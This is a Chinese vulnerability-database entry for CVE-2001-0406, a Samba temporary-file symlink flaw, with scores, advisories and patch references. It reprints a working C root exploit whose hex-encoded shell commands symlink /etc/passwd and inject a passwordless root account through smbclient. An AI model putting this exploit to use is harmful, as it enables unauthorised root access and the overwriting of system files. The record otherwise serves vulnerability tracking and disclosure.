CVE-2001-0406
CVSS2.1
发布时间 :2001-07-02 00:00:00
修订时间 :2008-09-05 16:24:01
NMCOE    

[原文]Samba before 2.2.0 allows local attackers to overwrite arbitrary files via a symlink attack using (1) a printer queue query, (2) the more command in smbclient, or (3) the mput command in smbclient.


[CNNVD]Samba不安全TMP文件符号链接漏洞(CNNVD-200107-042)

        Samba 2.2.0之前版本存在漏洞。本地攻击者可以借助使用(1)打印机队列查询 , (2)smbclient中的更多命令,或 (3)smbclient中的mput命令的链接攻击覆盖任意文件。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0406
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0406
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-042
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/670568
(UNKNOWN)  CERT-VN  VU#670568
http://www.debian.org/security/2001/dsa-048
(VENDOR_ADVISORY)  DEBIAN  DSA-048
http://www.caldera.com/support/security/advisories/CSSA-2001-015.0.txt
(VENDOR_ADVISORY)  CALDERA  CSSA-2001-015.0
http://archives.neohapsis.com/archives/bugtraq/2001-04/0326.html
(VENDOR_ADVISORY)  BUGTRAQ  20010418 PROGENY-SA-2001-05: Samba /tmp vulnerabilities
http://archives.neohapsis.com/archives/bugtraq/2001-04/0319.html
(VENDOR_ADVISORY)  BUGTRAQ  20010418 TSLSA-#2001-0005 - samba
http://archives.neohapsis.com/archives/bugtraq/2001-04/0305.html
(VENDOR_ADVISORY)  BUGTRAQ  20010417 Samba 2.0.8 security fix
http://www.securityfocus.com/bid/2617
(UNKNOWN)  BID  2617
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-040.php3
(UNKNOWN)  MANDRAKE  MDKSA-2001:040
http://archives.neohapsis.com/archives/freebsd/2001-04/0608.html
(UNKNOWN)  FREEBSD  FreeBSD-SA-01:36
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000395
(UNKNOWN)  CONECTIVA  CLA-2001:395

- 漏洞信息

Samba不安全TMP文件符号链接漏洞
低危 访问验证错误
2001-07-02 00:00:00 2005-10-20 00:00:00
本地  
        Samba 2.2.0之前版本存在漏洞。本地攻击者可以借助使用(1)打印机队列查询 , (2)smbclient中的更多命令,或 (3)smbclient中的mput命令的链接攻击覆盖任意文件。

- 公告与补丁

        Available fixes:
        HP CIFS/9000 Server A.01.06
        
        Samba Samba 2.0.4
        
        Samba Samba 2.0.5
        
        Samba Samba 2.0.6
        
        Samba Samba 2.0.7
        

- 漏洞信息 (20776)

Samba 2.0.x Insecure TMP file Symbolic Link Vulnerability (EDBID:20776)
linux local
2001-04-17 Verified
0 Gabriel Maggiotti
N/A [点击下载]
source: http://www.securityfocus.com/bid/2617/info

Samba is a flexible file sharing packaged maintained by the Samba development group. It provides interoperatability between UNIX and Microsoft Windows systems, permitting the sharing of files and printing services.

A problem in the package could make it possible to deny service to legitimate users. Due to the insecure creation of files in the /tmp file system, it is possible for a user to create a symbolic link to other files owned by privileged users in the system, such as system device files, and write data to the files.

This vulnerability makes it possible for a local user to deny service to other users of the system, and potentially gain elevated privileges. 

/*
 * Samba Server r00t exploit
 *
 * Scope: Local (this exploit) and posible remote if conditions are given.
 * Vuln:
 *      RedHat 5.1
 *      RedHat 5.2
 *      RedHat 6.0
 *      RedHat 6.1
 *      RedHat 6.2
 *      RedHat 7.0
 *      RedHat 7.1
 *      I don't know if other versions are vulnerable too.
 *
 * Run this exploit and then take a look at your passwd file.
 * Run: ./samba-exp user
 *
 * Author:      Gabriel Maggiotti
 * Email:       gmaggiot@ciudad.com.ar
 * Webpage:     http://qb0x.net
 */


#include <stdio.h>
#include <string.h>

int main(int argc,char *argv[])
{
char inject1[]=
        "\x2f\x62\x69\x6e\x2f\x72\x6d\x20\x2d\x72\x66\x20\x2f"
        "\x74\x6d\x70\x2f\x78\x2e\x6c\x6f\x67";
char inject2[]=
        "\x2f\x62\x69\x6e\x2f\x6c\x6e\x20\x2d\x73\x20\x2f\x65"
        "\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x2f\x74\x6d"
        "\x70\x2f\x78\x2e\x6c\x6f\x67";
char inject3a[100]=
        "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x6d\x62\x63"
        "\x6c\x69\x65\x6e\x74\x20\x2f\x2f\x6c\x6f\x63\x61\x6c"
        "\x68\x6f\x73\x74\x2f\x22\xa\xa";
char inject3b[]=
        "\x3a\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e"
        "\x2f\x73\x68\x5c\x6e\x22\x20\x2d\x6e\x20\x2e\x2e\x2f"
        "\x2e\x2e\x2f\x2e\x2e\x2f\x74\x6d\x70\x2f\x78\x20\x2d"
        "\x4e\xa";

if(argc!=2){
        fprintf(stderr,"usage: %s <user>\n",*argv);
        return 1;
        }
strcat(inject3a,argv[1]);
strcat(inject3a,inject3b);
system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);

return 0;
}

		

- 漏洞信息

13870
Samba Printer Queue Query Symlink Arbitrary File Overwrite
Local Access Required Race Condition

- 漏洞描述

Unknown or Incomplete

- 时间线

2001-04-17 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站